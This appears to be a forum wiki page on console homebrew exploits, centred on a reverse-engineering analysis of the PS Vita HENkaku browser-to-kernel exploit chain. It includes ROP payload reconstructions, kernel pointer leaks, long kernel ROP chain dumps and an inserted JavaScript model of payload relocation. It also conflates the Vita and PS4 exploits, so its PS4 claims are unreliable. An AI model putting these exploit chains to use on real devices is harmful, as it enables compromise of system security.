Henkaku PlayStation 4

VERY IMPORTANT: Whenever the WIKI is edited to add more sections, always leave "Reverse engineering HenKaKu" last, because of its size.


If you use this, so far there have been 0 bricks and there probably won't be any since it is userland, but neither EOL, nor its staff, nor I, KirtashTheShek, take responsibility for any damage your console may suffer.

WIKI by KirtashTheShek // August 2016

Henkaku THREAD by Toni___18 // August 2016

Contents

Game firmware requirements and PSProxy

Games: http://www.elotrolado.net/hilo_ho-firmwares-requeridos-de-juegos_2203180#p1742720621

PSProxy: (for now) dead in action.

Henkaku for beginners

This is a guide, written so as not to clutter the thread.

Firmware 3.55, 3.50 or 3.15 is required for it to work.

As of today (28/08/2016) Henkaku is a user-mode exploit. Put plainly, it can:

- Load emulators.

- Load homebrew applications.

The only requirement is that these applications do not need kernel mode.

There are no emulators yet, but it won't take long: the exploit is already here, and if you follow the thread you will see a new development every so often. Applications will come; someone just has to port them to PS4.

For now Henkaku, although everything is released publicly, is aimed at developers and sceners, since it is only a PoC at the moment. Module dumps can be made, etc.


Updating is strongly discouraged.

If you want to know more, read the rest of the wiki.

Sources used

Psxhax.com

Wololo.net

Elotrolado.net

GitHub.com


Best sites for following scene progress

Here on EOL:

http://www.elotrolado.net/hilo_scene-henkaku-portado-a-ps4_2182892

http://www.elotrolado.net/hilo_scene-liberan-el-exploit-dlclose-para-correr-linux-en-la-ps4_2163276

PSXHAX

Wololo.net

IMPORTANT: for Wololo, use the English edition; the Spanish one is discontinued.

How did Henkaku start?

Henkaku is a kernel-mode exploit for the PS Vita, developed by Team molecule (Yifan Lu, Davee, Proxima and xyz).

On August 6th, developer @Fire30_ tweeted the well-known site wololo a link to his GitHub,

where the PoC (Proof of Concept) can be found.

On the Vita, as said above, it is kernel mode; on the PS4, until something more is discovered, it is userland only.


How do I run the exploit?

There are 3 options.

From the GitHub tutorial (in English): https://github.com/Fire30/PS4-3.55-Code-Execution-PoC

From fellow user @trigui's server: psxserver.com

From the 3.55 playground: https://github.com/Cryptogenic/PS4-Playground-3.55 V1.0 22/6/16

IMPORTANT Update: the latter already has a successor, see here: https://www.psxhax.com/threads/ps4console-by-cryptogenic-ps4-playground-3-55-successor.686/

Running the PS4 operating system (OrbisOS)

A user of the well-known site wololo published this to get OrbisOS running on a PC.

PS4 tools

Dump process memory --> trigui's server or here

PS4Tools by Keyaku: various tools for PS4 --> here or here

PS4 libraries --> GitHub

File explorer (3.55) by MrV1rus --> here

Reverse engineering Henkaku

VERY IMPORTANT: Whenever the WIKI is edited to add more sections, always leave this one last, because of its size.

By: HexKiz

Part 1

- Stage 1 (browser exploit): Visiting http://henkaku.xyz and pressing the "Install" button results in a server side useragent check. If the browser's useragent matches that of a PS Vita/PSTV on the latest firmware version (3.60), the user is redirected to http://go.henkaku.xyz and an exploit is deployed. This exploit re-uses elements from the older public exploits (heap spraying method, sort() bug, scrollLeft attribute manipulation) and pairs them with a new heap corruption technique. Team molecule renamed variables and methods to provide a simple obfuscation layer on the HTML code.

You can find the partially reversed code (focusing on the most crucial portions) here: http://pastebin.com/bYA4xGaQ

Similarly to older exploits, this allows corrupting an object's vtable and achieving ROP inside the SceWebkit module. Offsets for libraries and relevant ROP gadgets are fetched from a javascript file (http://go.henkaku.xyz/payload.js) during the last stage of the exploit. Team molecule implemented a dynamic method to relocate gadgets and functions' offsets for each module after their base addresses are found (by looking at SceWebkit's import stubs).

- Stage 2 (ROP payload 1): At this stage, the browser exploit has laid out the memory space to start the first ROP payload which is reconstructed from the payload.js file. The payload.js file contains two arrays, one containing the payload's binary data and another containing the relocation type for each word. By crossing this information the exploit reads the payload and relocates all code offsets to their target module's address space by adding the module's base address to them:

Relocation type 0 -> Plain data stored inside the ROP space itself. No relocation needed.
Relocation type 1 -> Offset inside the ROP payload's stack.
Relocation type 2 -> Offset inside the SceWebkit module.
Relocation type 3 -> Offset inside the SceLibKernel module.
Relocation type 4 -> Offset inside the SceLibc module.
Relocation type 5 -> Offset inside the SceLibHttp module.
Relocation type 6 -> Offset inside the SceNet(?) module.
Relocation type 7 -> Offset inside the SceDriverUser(?) module.

The reconstructed payload can be found here: https://www.sendspace.com/file/mwpeut And an analysis of the payload's binary data can be found here: http://pastebin.com/gxc0cX1i

This payload is responsible for taking care of a few things like:

// Do stuff ...

// Create a new thread for the second payload
int thread_id = sceKernelCreateThread("st2", SceWebkit_base + 0x000054C8, 0x10000100, 0x00600000, 0x00000000, 0x00000000, 0x00000000);

// Do stuff ...

// Construct the arguments for fetching the second payload
strcpy(stack_base + 0x000000BC, "http://go.henkaku.xyz/x");
snprintf(stack_base + 0x000002C4, 0x00000100, "?a1=%x", stack_base);
strcpy(stack_base + 0x000000BC, stack_base + 0x000002C4);
snprintf(stack_base + 0x000002C4, 0x00000100, "&a2=%x&a3=%x&a4=%x&", SceWebkit_base, SceLibKernel_base, SceLibc_base);
strcpy(stack_base + 0x000000BC, stack_base + 0x000002C4);
snprintf(stack_base + 0x000002C4, 0x00000100, "&a5=%x&a6=%x&a7=%x&", SceLibHttp_base, SceNet_base, SceDriverUser_base);
strcpy(stack_base + 0x000000BC, stack_base + 0x000002C4);

// Do stuff ...

// Send HTTP requests to fetch the second payload
SceLibHttp_92fd(0x00010000);
int http_buf = SceLibHttp_947b("ldr", 0x00000002, 0x00000001);
SceLibHttp_950b(http_buf, stack_base + 0x000000BC, 0x00000000);
int http_req = SceLibHttp_95ff(http_buf, 0x00000000, stack_base + 0x000000BC);
SceLibHttp_9935(http_req, 0x00000000, 0x00000000);
SceLibHttp_9983(http_req);

// Do stuff ...

After the first payload is done, an HTTP request is sent to the server using the following template: http://go.henkaku.xyz/x?a1=stack_base&a ... user_base&

Example: http://go.henkaku.xyz/x?a1=89f02000&a2= ... =e0047bf0&

The "x" script on the server side collects the base addresses for each module and generates a second payload to be run on the Vita.

- Stage 3 (ROP payload 2): The second payload is composed of another ROP chain and obfuscated ARM code. A preliminary analysis of this payload reveals a few interesting things:

strcpy(stack_base + 0x000086B4, "sdstor0:");
strcpy(stack_base + 0x000086CC, "xmc-lp-ign-userext");

// Do stuff ...

strcpy(stack_base + 0x000086E4, "molecule0:");

SceLibKernel_a4ad("molecule0:");
SceLibKernel_a55d("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014);

// Do stuff ...

int thread1_id = sceKernelCreateThread("pln", SceWebkit_base + 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x000003FF, 0x00000000);

SceLibKernel_a791(thread1_id, 0x7C);

// Do stuff ...

int thread2_id = sceKernelCreateThread("mhm", SceWebkit_base + 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x00000000, 0x00000000);

// Do stuff ...

SceNet_27E1("x", 0x00000002, 0x00000001);
SceNet_27E1("x", 0x00000002, 0x00000001);
SceNet_27E1("x", 0x00000002, 0x00000001);
SceNet_27E1("x", 0x00000002, 0x00000001);
SceNet_27E1("x", 0x00000002, 0x00000001);

// Do stuff ...

SceNet_27E1("sss", 0x00000002, 0x00000001);
SceNet_27E1("tst", 0x00000002, 0x00000007);
SceNet_27E1("tmp", 0x00000002, 0x00000001);

// Do stuff ...


To be continued... ~ H.
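The following is an added example, not code from the HENkaku exploit or from HexKiz's analysis above. It models the payload.js relocation scheme described in Stage 2 (two parallel arrays, one data word and one relocation type per word, relocated by adding the base of the module the type names) and the Stage 2 to server round trip, where payload 1 reports the seven base addresses as a1..a7 and the server-side "x" script parses them and relocates a second payload against them. Relocation type numbers follow the analysis; the modules assumed for types 6 and 7 (SceNet, SceDriverUser) are the analysis's own guesses, and the base addresses and the four-word template are constructed sample data. One detail worth noticing: the format strings recovered from payload 1 ("&a4=%x&" followed by "&a5=%x") produce a double & in the query, which a standard query parser such as URLSearchParams simply skips.

```javascript
// Added example (not Team molecule's or HexKiz's code): model of the payload.js
// relocation scheme and of the stage-2 -> server base-address handshake.

// Relocation type -> which base address gets added (types from the analysis;
// the SceNet / SceDriverUser names for 6 and 7 are the analysis's guesses).
const RELOC_TARGET = {
  1: "stack",         // offset inside the ROP payload's own stack
  2: "SceWebkit",
  3: "SceLibKernel",
  4: "SceLibc",
  5: "SceLibHttp",
  6: "SceNet",
  7: "SceDriverUser",
};
const ORDER = ["stack", "SceWebkit", "SceLibKernel", "SceLibc", "SceLibHttp", "SceNet", "SceDriverUser"];

const u32 = (x) => x >>> 0; // keep every value inside the 32-bit ARM word range

// Relocate a payload given as two parallel arrays, as payload.js carries it.
// Type 0 is copied verbatim; any other type adds the matching module base.
function relocatePayload(words, types, bases) {
  if (words.length !== types.length) throw new Error("data/type arrays differ in length");
  const out = new Uint32Array(words.length);
  for (let i = 0; i < words.length; i++) {
    const t = types[i];
    if (t === 0) { out[i] = u32(words[i]); continue; }
    const target = RELOC_TARGET[t];
    if (target === undefined) throw new Error(`unknown relocation type ${t} at word ${i}`);
    if (!(target in bases)) throw new Error(`no base address known for ${target}`);
    out[i] = u32(words[i] + bases[target]);
  }
  return out;
}

// Client side: the exact string payload 1 assembles with its snprintf/strcpy
// sequence ("?a1=%x", then "&a2=..&a3=..&a4=..&", then "&a5=..&a6=..&a7=..&").
function buildStage2Url(bases) {
  const hex = (k) => u32(bases[k]).toString(16);
  return "http://go.henkaku.xyz/x" +
    `?a1=${hex("stack")}` +
    `&a2=${hex("SceWebkit")}&a3=${hex("SceLibKernel")}&a4=${hex("SceLibc")}&` +
    `&a5=${hex("SceLibHttp")}&a6=${hex("SceNet")}&a7=${hex("SceDriverUser")}&`;
}

// Server side ("x" script): recover the seven bases from a1..a7, rejecting
// anything that is not a plain 32-bit hex value.
function parseStage2Request(url) {
  const params = new URL(url).searchParams;
  const bases = {};
  ORDER.forEach((name, i) => {
    const v = params.get(`a${i + 1}`);
    if (v === null || !/^[0-9a-f]{1,8}$/i.test(v)) throw new Error(`bad or missing a${i + 1}`);
    bases[name] = parseInt(v, 16);
  });
  return bases;
}

// Server side: relocate a payload-2 template against the bases the Vita reported.
function generateStage2(url, templateWords, templateTypes) {
  return relocatePayload(templateWords, templateTypes, parseStage2Request(url));
}

// Constructed sample data (not real HENkaku bases or payload words).
const SAMPLE_BASES = {
  stack: 0x89f02000, SceWebkit: 0x81000000, SceLibKernel: 0xe0000000, SceLibc: 0xe0100000,
  SceLibHttp: 0xe0200000, SceNet: 0xe0300000, SceDriverUser: 0xe0047bf0,
};
const TEMPLATE_WORDS = [0x000054c8, 0x0000a4ad, 0x000086b4, 0x00000005];
const TEMPLATE_TYPES = [2, 3, 1, 0]; // Webkit gadget, LibKernel function, string on the stack, immediate

const demoUrl = buildStage2Url(SAMPLE_BASES);
console.log(demoUrl);
console.log(Array.from(generateStage2(demoUrl, TEMPLATE_WORDS, TEMPLATE_TYPES), (w) => "0x" + w.toString(16)));
```

The two halves share relocatePayload on purpose: the browser uses it once with the bases it discovered from SceWebkit's import stubs, and the server uses the same operation with the bases it was sent, which is why the handshake only has to carry seven numbers rather than the whole second payload's layout.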

Part 2

- Stage 3 (ROP payload 2): The second payload is composed of another ROP chain and data. It creates two userland threads (each one with its own ROP chain), that take care of leaking kernel pointers (by issuing devctl commands to "sdstor0:") and breaking the userland sandbox (by exploiting sceNet functions).

// Copy SD card device path and param
strcpy(x_stack + 0x000086B4, "sdstor0:");
strcpy(x_stack + 0x000086CC, "xmc-lp-ign-userext");

// Clear devctl 0x05 outbuf
// From x_stack + 0x00006F34 to x_stack + 0x00007334
memset(x_stack + 0x00006F34, 0x00000000, 0x00000400);

// Copy dummy device path
strcpy(x_stack + 0x000086E4, "molecule0:");

// Mount path?
sceLibKernel_A4AD("molecule0:");

// Send command 0x05 to "sdstor0:"
sceIoDevctl("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014, x_stack + 0x00006F34, 0x000003FF);

// Store leaked kernel pointer 1
// Comes from devctl_outbuf + 0x3D4
0x00(x_stack + 0x00008464) = 0x00(x_stack + 0x00007308) + 0xFFFFA8B9

// Create "pln" thread
// "pln" == "pointer leak n"?
// Entry (0x000054C8): LDMIA R1,{R1,R2,R4,R8,R11,SP,PC}
int thread_id = sceKernelCreateThread("pln", 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x00000000, 0x00000000);

// Store "pln" thread's ID
0x00(x_stack + 0x00008E94) = thread_id

// Store SceKernelThreadInfo size
0x00(x_stack + 0x0000862C) = 0x7C

// Get thread info structure
sceKernelGetThreadInfo(thread_id, x_stack + 0x0000862C);

// Save pln_threadinfo.stack + 0x00001000
0x00(x_stack + 0x00008EA0) = 0x00(x_stack + 0x00008660) + 0x00001000

// Stack parameters for "pln" ROP chain
0x00(x_stack + 0x00008954) = 0x00000014
0x00(x_stack + 0x00008958) = x_stack + 0x00006F34
0x00(x_stack + 0x0000895C) = 0x000003FF

// Stack parameters for "pln" ROP chain
0x00(x_stack + 0x0000896C) = 0x00000400
0x00(x_stack + 0x00008970) = 0x00000000
0x00(x_stack + 0x00008974) = 0x00000000

// Setup "pln" ROP chain
0x00(x_stack + 0x00008708) = 0x008DD9B5
0x00(x_stack + 0x0000870C) = 0x000086E4
0x00(x_stack + 0x00008710) = 0x00000000
0x00(x_stack + 0x00008714) = 0x00000000
0x00(x_stack + 0x00008718) = 0x00000000
0x00(x_stack + 0x0000871C) = 0x0000A4AD
0x00(x_stack + 0x00008720) = 0x00000000
0x00(x_stack + 0x00008724) = 0x000FCDBB
0x00(x_stack + 0x00008728) = 0x00000000
0x00(x_stack + 0x0000872C) = 0x008DD9B5
0x00(x_stack + 0x00008730) = 0x000086B4
0x00(x_stack + 0x00008734) = 0x00000005
0x00(x_stack + 0x00008738) = 0x000086CC
0x00(x_stack + 0x0000873C) = 0x00008954
0x00(x_stack + 0x00008740) = 0x0000690C
0x00(x_stack + 0x00008744) = 0x00000000
0x00(x_stack + 0x00008748) = 0x000FCDBB
0x00(x_stack + 0x0000874C) = 0x00000000
0x00(x_stack + 0x00008750) = 0x008DD9B5
0x00(x_stack + 0x00008754) = 0x000F4240
0x00(x_stack + 0x00008758) = 0x00000000
0x00(x_stack + 0x0000875C) = 0x00000000
0x00(x_stack + 0x00008760) = 0x00000000
0x00(x_stack + 0x00008764) = 0x00018544
0x00(x_stack + 0x00008768) = 0x00000000
0x00(x_stack + 0x0000876C) = 0x000FCDBB
0x00(x_stack + 0x00008770) = 0x00000000
0x00(x_stack + 0x00008774) = 0x008DD9B5
0x00(x_stack + 0x00008778) = 0x000086B4
0x00(x_stack + 0x0000877C) = 0x00000005
0x00(x_stack + 0x00008780) = 0x00007444
0x00(x_stack + 0x00008784) = 0x0000896C
0x00(x_stack + 0x00008788) = 0x0000690C
0x00(x_stack + 0x0000878C) = 0x00000000
0x00(x_stack + 0x00008790) = 0x000FCDBB
0x00(x_stack + 0x00008794) = 0x00000000
0x00(x_stack + 0x00008798) = 0x00000519

/* "pln" ROP

// Mount path?
sceLibKernel_A4AD("molecule0:");

// Send devctl 0x05
sceIoDevctl_syscall("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014, x_stack + 0x00006F34, 0x000003FF);

// Delay for a while
sceKernelDelayThread(1000000);

// Send devctl 0x05 again using
// input buffer from x_stack + 0x00007444 to x_stack + 0x00007844
sceIoDevctl_syscall("sdstor0:", 0x00000005, x_stack + 0x00007444, 0x00000400, 0x00000000, 0x00000000);

// Deadlock
sceWebkit_519();

*/

// Copy "pln" ROP chain into "pln" thread's stack
memcpy(0x00(x_stack + 0x00008EA0), x_stack + 0x00008708, 0x00000100);

// Set stack pointer
0x00(x_stack + 0x00008830) = x_stack + 0x00008EA0

// Set PC
0x00(x_stack + 0x00008834) = 0x000C048B // POP {PC}

// Start "pln" thread
// Thread arguments are loaded into R1 and the gadget
// at the thread's entrypoint then loads register values
// from it, overwriting SP and PC and triggering the
// ROP chain
sceKernelStartThread(thread_id, 0x0000001C, x_stack + 0x0000881C);

// Delay for a while
sceKernelDelayThread(100000);

// Store leaked kernel pointer 2
// Comes from devctl_outbuf + 0x3C4
0x00(x_stack + 0x00008458) = 0x00(x_stack + 0x000072F8) + 0xFFFFF544

// Setup pointer to leaked address in kernel module 1
0x00(x_stack + 0x00007444) = 0x00(x_stack + 0x00008464) + 0x0001E460

// Setup pointer to leaked address in kernel module 2
0x00(x_stack + 0x00008EAC) = 0x00(x_stack + 0x00008458) + 0x000006F8 + 0x00000300

// Setup kernel mode ROP chain
0x00(x_stack + 0x00008A8C) = 0x00(x_stack + 0x00008464) + 0x00000031
0x00(x_stack + 0x00008A90) = 0x08106803
0x00(x_stack + 0x00008A94) = 0x00(x_stack + 0x00008464) + 0x0001EFF1
0x00(x_stack + 0x00008A98) = 0x00000038
0x00(x_stack + 0x00008A9C) = 0x00(x_stack + 0x00008464) + 0x0001EFE1
0x00(x_stack + 0x00008AA0) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008AA4) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008AA8) = 0x00(x_stack + 0x00008464) + 0x0001B571
0x00(x_stack + 0x00008AAC) = 0x00000000
0x00(x_stack + 0x00008AB0) = 0x00(x_stack + 0x00008464) + 0x00001E43
0x00(x_stack + 0x00008AB4) = 0x00000000
0x00(x_stack + 0x00008AB8) = 0x00(x_stack + 0x00008464) + 0x0001FC6D
0x00(x_stack + 0x00008ABC) = 0x00(x_stack + 0x00008464) + 0x0000EA73
0x00(x_stack + 0x00008AC0) = 0x00(x_stack + 0x00008464) + 0x00000031
0x00(x_stack + 0x00008AC4) = 0x00(x_stack + 0x00008464) + 0x00027913
0x00(x_stack + 0x00008AC8) = 0x00(x_stack + 0x00008464) + 0x0000A523
0x00(x_stack + 0x00008ACC) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008AD0) = 0x00(x_stack + 0x00008464) + 0x00000CE3
0x00(x_stack + 0x00008AD4) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008AD8) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
0x00(x_stack + 0x00008ADC) = 0x00(x_stack + 0x00008464) + 0x00000067
0x00(x_stack + 0x00008AE0) = 0x00(x_stack + 0x00008464) + 0x0000587F
0x00(x_stack + 0x00008AE4) = 0x00(x_stack + 0x00008464) + 0x00019713
0x00(x_stack + 0x00008AE8) = 0x00(x_stack + 0x00008464) + 0x00001605
0x00(x_stack + 0x00008AEC) = 0x00(x_stack + 0x00008464) + 0x00001E1D
0x00(x_stack + 0x00008AF0) = 0x00000000
0x00(x_stack + 0x00008AF4) = 0x00(x_stack + 0x00008464) + 0x0001EFE1
0x00(x_stack + 0x00008AF8) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008AFC) = 0x00(x_stack + 0x00008464) + 0x00001603
0x00(x_stack + 0x00008B00) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
0x00(x_stack + 0x00008B04) = 0x00(x_stack + 0x00008464) + 0x00001F17
0x00(x_stack + 0x00008B08) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008B0C) = 0x00(x_stack + 0x00008464) + 0x00000031
0x00(x_stack + 0x00008B10) = 0x00(x_stack + 0x00008464) + 0x0000B913
0x00(x_stack + 0x00008B14) = 0x00(x_stack + 0x00008464) + 0x00023B61
0x00(x_stack + 0x00008B18) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008B1C) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008B20) = 0x00(x_stack + 0x00008464) + 0x000232EB
0x00(x_stack + 0x00008B24) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008B28) = 0x00(x_stack + 0x00008464) + 0x0001B571
0x00(x_stack + 0x00008B2C) = 0x00(x_stack + 0x00008464) + 0x00023B61
0x00(x_stack + 0x00008B30) = 0x00(x_stack + 0x00008464) + 0x000232F1
0x00(x_stack + 0x00008B34) = 0x00(x_stack + 0x00008464) + 0x00001411
0x00(x_stack + 0x00008B38) = 0x00(x_stack + 0x00008464) + 0x00000AE1
0x00(x_stack + 0x00008B3C) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008B40) = 0x00(x_stack + 0x00008464) + 0x000050E9
0x00(x_stack + 0x00008B44) = 0x00(x_stack + 0x00008464) + 0x00001411
0x00(x_stack + 0x00008B48) = 0x00000010
0x00(x_stack + 0x00008B4C) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
0x00(x_stack + 0x00008B50) = 0x00(x_stack + 0x00008464) + 0x00012B11
0x00(x_stack + 0x00008B54) = 0x00(x_stack + 0x00008464) + 0x00000CE3
0x00(x_stack + 0x00008B58) = 0x00(x_stack + 0x00008464) + 0x000000D1
0x00(x_stack + 0x00008B5C) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008B60) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
0x00(x_stack + 0x00008B64) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008B68) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008B6C) = 0x00(x_stack + 0x00008464) + 0x0001FDC5
0x00(x_stack + 0x00008B70) = 0x00(x_stack + 0x00008464) + 0x0001D8DB
0x00(x_stack + 0x00008B74) = 0x00(x_stack + 0x00008464) + 0x00019399
0x00(x_stack + 0x00008B78) = 0x00(x_stack + 0x00008464) + 0x00019399
0x00(x_stack + 0x00008B7C) = 0x00(x_stack + 0x00008464) + 0x00011C5F
0x00(x_stack + 0x00008B80) = 0x00(x_stack + 0x00008464) + 0x00019399
0x00(x_stack + 0x00008B84) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008B88) = 0x00(x_stack + 0x00008464) + 0x0000B913
0x00(x_stack + 0x00008B8C) = 0x00000000
0x00(x_stack + 0x00008B90) = 0x00(x_stack + 0x00008464) + 0x0001EFE1
0x00(x_stack + 0x00008B94) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008B98) = 0x00(x_stack + 0x00008464) + 0x00001861
0x00(x_stack + 0x00008B9C) = 0x00(x_stack + 0x00008464) + 0x0001FC6D
0x00(x_stack + 0x00008BA0) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
0x00(x_stack + 0x00008BA4) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008BA8) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008BAC) = 0x00(x_stack + 0x00008464) + 0x00019399
0x00(x_stack + 0x00008BB0) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008BB4) = 0x00(x_stack + 0x00008464) + 0x00019399
0x00(x_stack + 0x00008BB8) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008BBC) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008BC0) = 0x00(x_stack + 0x00008464) + 0x0001614D
0x00(x_stack + 0x00008BC4) = 0x00(x_stack + 0x00008464) + 0x000233D3
0x00(x_stack + 0x00008BC8) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
0x00(x_stack + 0x00008BCC) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008BD0) = 0x00(x_stack + 0x00008464) + 0x000000AF
0x00(x_stack + 0x00008BD4) = 0x00(x_stack + 0x00008464) + 0x00001605
0x00(x_stack + 0x00008BD8) = 0x00(x_stack + 0x00008464) + 0x0001EFE1
0x00(x_stack + 0x00008BDC) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008BE0) = 0x00(x_stack + 0x00008464) + 0x000050E9
0x00(x_stack + 0x00008BE4) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008BE8) = 0x00(x_stack + 0x00008464) + 0x00001347
0x00(x_stack + 0x00008BEC) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008BF0) = 0x00(x_stack + 0x00008464) + 0x000000B9
0x00(x_stack + 0x00008BF4) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
0x00(x_stack + 0x00008BF8) = 0x00(x_stack + 0x00008464) + 0x00001347
0x00(x_stack + 0x00008BFC) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008C00) = 0x00(x_stack + 0x00008464) + 0x0000039B
0x00(x_stack + 0x00008C04) = 0x00000000
0x00(x_stack + 0x00008C08) = 0x00(x_stack + 0x00008464) + 0x0001CB95
0x00(x_stack + 0x00008C0C) = 0x00(x_stack + 0x00008464) + 0x0001EA93
0x00(x_stack + 0x00008C10) = 0x00(x_stack + 0x00008464) + 0x00001411
0x00(x_stack + 0x00008C14) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008C18) = 0x00(x_stack + 0x00008464) + 0x000209D7
0x00(x_stack + 0x00008C1C) = 0x00(x_stack + 0x00008464) + 0x000209D3
0x00(x_stack + 0x00008C20) = 0x00(x_stack + 0x00008464) + 0x00001411
0x00(x_stack + 0x00008C24) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008C28) = 0x00(x_stack + 0x00008464) + 0x0001BAF5
0x00(x_stack + 0x00008C2C) = 0x00(x_stack + 0x00008464) + 0x00001605
0x00(x_stack + 0x00008C30) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008C34) = 0x00(x_stack + 0x00008464) + 0x0000652B
0x00(x_stack + 0x00008C38) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008C3C) = 0x00(x_stack + 0x00008464) + 0x0001BAF5
0x00(x_stack + 0x00008C40) = 0x00(x_stack + 0x00008464) + 0x00022A49
0x00(x_stack + 0x00008C44) = 0xFFFFFEB0
0x00(x_stack + 0x00008C48) = 0x00(x_stack + 0x00008464) + 0x0000039B
0x00(x_stack + 0x00008C5C) = 0x00000040
0x00(x_stack + 0x00008C50) = 0x00(x_stack + 0x00008464) + 0x00022A49
0x00(x_stack + 0x00008C54) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008C58) = 0x00(x_stack + 0x00008464) + 0x0000652B
0x00(x_stack + 0x00008C6C) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008C60) = 0x00(x_stack + 0x00008464) + 0x0000039B
0x00(x_stack + 0x00008C64) = 0x00000040
0x00(x_stack + 0x00008C68) = 0x00(x_stack + 0x00008464) + 0x00001605
0x00(x_stack + 0x00008C6C) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008C70) = 0x00(x_stack + 0x00008464) + 0x0001D9EB
0x00(x_stack + 0x00008C74) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008C78) = 0x00(x_stack + 0x00008464) + 0x00000853
0x00(x_stack + 0x00008C7C) = 0x00(x_stack + 0x00008464) + 0x0001D8DB
0x00(x_stack + 0x00008C80) = 0x00000038
0x00(x_stack + 0x00008C84) = 0x00(x_stack + 0x00008464) + 0x000000AB
0x00(x_stack + 0x00008C88) = 0x00(x_stack + 0x00008464) + 0x000000D1
0x00(x_stack + 0x00008C8C) = 0x00(x_stack + 0x00008464) + 0x0002328B
0x00(x_stack + 0x00008C90) = 0x00(x_stack + 0x00008464) + 0x00022FCD
0x00(x_stack + 0x00008C94) = 0x00(x_stack + 0x00008464) + 0x000000D1
0x00(x_stack + 0x00008C98) = 0x00(x_stack + 0x00008464) + 0x0001EFF1
0x00(x_stack + 0x00008C9C) = 0x00(x_stack + 0x00008464) + 0x0002A117
0x00(x_stack + 0x00008CA0) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008CA4) = 0x00(x_stack + 0x00008464) + 0x00001605
0x00(x_stack + 0x00008CA8) = 0x00(x_stack + 0x00008464) + 0x00019399
0x00(x_stack + 0x00008CAC) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008CB0) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008CB4) = 0x00(x_stack + 0x00008464) + 0x0001BF1F
0x00(x_stack + 0x00008CB8) = 0xFFFFFEB0
0x00(x_stack + 0x00008CBC) = 0x00(x_stack + 0x00008464) + 0x0000039B
0x00(x_stack + 0x00008CC0) = 0x00000040
0x00(x_stack + 0x00008CC4) = 0x00(x_stack + 0x00008464) + 0x00022A49
0x00(x_stack + 0x00008CC8) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008CCC) = 0x00(x_stack + 0x00008464) + 0x00003D73
0x00(x_stack + 0x00008CD0) = 0x00000000
0x00(x_stack + 0x00008CD4) = 0x00(x_stack + 0x00008464) + 0x000021FD
0x00(x_stack + 0x00008CD8) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008CDC) = 0x00(x_stack + 0x00008464) + 0x000050E9
0x00(x_stack + 0x00008CE0) = 0x00(x_stack + 0x00008464) + 0x00000AE1
0x00(x_stack + 0x00008CE4) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008CE8) = 0x00(x_stack + 0x00008464) + 0x0002A117
0x00(x_stack + 0x00008CEC) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008CF0) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
0x00(x_stack + 0x00008CF4) = 0x00(x_stack + 0x00008464) + 0x00000067
0x00(x_stack + 0x00008CF8) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008CFC) = 0x00(x_stack + 0x00008464) + 0x0001BF47
0x00(x_stack + 0x00008D00) = 0x00(x_stack + 0x00008464) + 0x00000347
